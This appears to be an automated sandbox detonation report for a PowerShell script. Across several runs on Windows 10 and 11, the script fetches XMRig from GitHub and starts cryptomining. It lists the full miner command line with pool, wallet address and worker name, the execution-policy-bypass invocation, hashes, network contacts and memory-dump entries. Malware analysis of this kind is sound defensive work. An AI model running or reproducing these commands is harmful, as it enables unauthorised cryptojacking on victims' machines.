powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 90.16.208.104.in-addr.arpa udp

Files

memory/4936-0-0x00007FFA3AA53000-0x00007FFA3AA55000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z0on1hao.lyt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4936-10-0x0000024CD33A0000-0x0000024CD33C2000-memory.dmp

memory/4936-11-0x00007FFA3AA50000-0x00007FFA3B511000-memory.dmp

memory/4936-12-0x00007FFA3AA50000-0x00007FFA3B511000-memory.dmp

memory/4936-14-0x00007FFA3AA50000-0x00007FFA3B511000-memory.dmp

memory/4936-15-0x0000024CEDB70000-0x0000024CEDB82000-memory.dmp

memory/4936-16-0x0000024CD33F0000-0x0000024CD33FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3268-47-0x00000297A2E80000-0x00000297A2EA0000-memory.dmp

memory/3268-48-0x00000297A4880000-0x00000297A48A0000-memory.dmp

memory/3268-49-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/4936-50-0x00007FFA3AA53000-0x00007FFA3AA55000-memory.dmp

memory/4936-51-0x00007FFA3AA50000-0x00007FFA3B511000-memory.dmp

memory/3268-53-0x00000297A48A0000-0x00000297A48C0000-memory.dmp

memory/3268-52-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-54-0x00000297A48C0000-0x00000297A48E0000-memory.dmp

memory/4936-55-0x00007FFA3AA50000-0x00007FFA3B511000-memory.dmp

memory/3268-56-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-58-0x00000297A48A0000-0x00000297A48C0000-memory.dmp

memory/3268-57-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-59-0x00000297A48C0000-0x00000297A48E0000-memory.dmp

memory/3268-60-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-61-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-62-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-63-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-64-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-65-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-66-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-67-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-68-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-69-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-70-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-71-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-72-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-73-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-74-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-75-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-76-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-77-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-78-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-79-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-80-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-81-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-82-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-83-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-84-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-85-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-86-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-87-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-88-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-89-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-90-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-91-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-92-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-93-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-94-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-95-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-96-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-97-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-98-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-99-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-100-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-101-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-102-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-103-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-104-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-105-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-106-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-107-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-108-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-109-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-110-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-111-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-112-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-113-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-114-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-115-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-116-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-117-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

memory/3268-118-0x00007FF630470000-0x00007FF6310A3000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:57

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

memory/2792-0-0x00007FF800FD3000-0x00007FF800FD5000-memory.dmp

memory/2792-6-0x000002ACC6B40000-0x000002ACC6B62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1txqsdxj.bmw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2792-11-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/2792-12-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/2792-14-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/2792-15-0x000002ACC6DB0000-0x000002ACC6DC2000-memory.dmp

memory/2792-16-0x000002ACC6B20000-0x000002ACC6B2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1052-47-0x000001EBB3B50000-0x000001EBB3B70000-memory.dmp

memory/1052-48-0x000001EBB5350000-0x000001EBB5370000-memory.dmp

memory/1052-49-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/2792-50-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/2792-51-0x00007FF800FD3000-0x00007FF800FD5000-memory.dmp

memory/1052-52-0x000001EBB5370000-0x000001EBB5390000-memory.dmp

memory/1052-53-0x000001EBB5390000-0x000001EBB53B0000-memory.dmp

memory/1052-54-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/2792-55-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/1052-56-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-58-0x000001EBB5370000-0x000001EBB5390000-memory.dmp

memory/1052-57-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-59-0x000001EBB5390000-0x000001EBB53B0000-memory.dmp

memory/1052-60-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-61-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-62-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-63-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-64-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-65-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-66-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-67-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-68-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-69-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-70-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-71-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-72-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-73-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-74-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-75-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-76-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-77-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-78-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-79-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-80-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-81-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-82-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-83-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-84-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-85-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-86-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-87-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-88-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-89-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-90-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-91-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-92-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-93-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-94-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-95-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-96-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-97-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-98-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-99-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-100-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-101-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-102-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-103-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-104-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-105-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-106-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-107-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-108-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-109-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-110-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-111-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-112-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-113-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-114-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-115-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-116-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-117-0x00007FF788660000-0x00007FF789293000-memory.dmp

memory/1052-118-0x00007FF788660000-0x00007FF789293000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 01:00

Platform

win11-20240508-en

Max time kernel

1798s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2660-0-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_44v4i4a0.ybe.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2660-9-0x000001C17B5B0000-0x000001C17B5D2000-memory.dmp

memory/2660-10-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2660-11-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2660-12-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2660-14-0x000001C17B650000-0x000001C17B662000-memory.dmp

memory/2660-15-0x000001C17B640000-0x000001C17B64A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2424-46-0x00000273E1EC0000-0x00000273E1EE0000-memory.dmp

memory/2424-47-0x00000273E1F10000-0x00000273E1F30000-memory.dmp

memory/2424-48-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-49-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-51-0x00000273E3800000-0x00000273E3820000-memory.dmp

memory/2424-52-0x00000273E1F30000-0x00000273E1F50000-memory.dmp

memory/2660-50-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2660-53-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

memory/2424-54-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-55-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-56-0x00000273E3800000-0x00000273E3820000-memory.dmp

memory/2424-57-0x00000273E1F30000-0x00000273E1F50000-memory.dmp

memory/2424-58-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-59-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-60-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-61-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-62-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-63-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-64-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-65-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-66-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-67-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-68-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-69-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-70-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-71-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-72-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-73-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-74-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-75-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-76-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-77-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-78-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-79-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-80-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-81-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-82-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-83-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-84-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-85-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-86-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-87-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-88-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-89-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-90-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-91-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-92-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

memory/2424-93-0x00007FF6C43D0000-0x00007FF6C5003000-memory.dmp

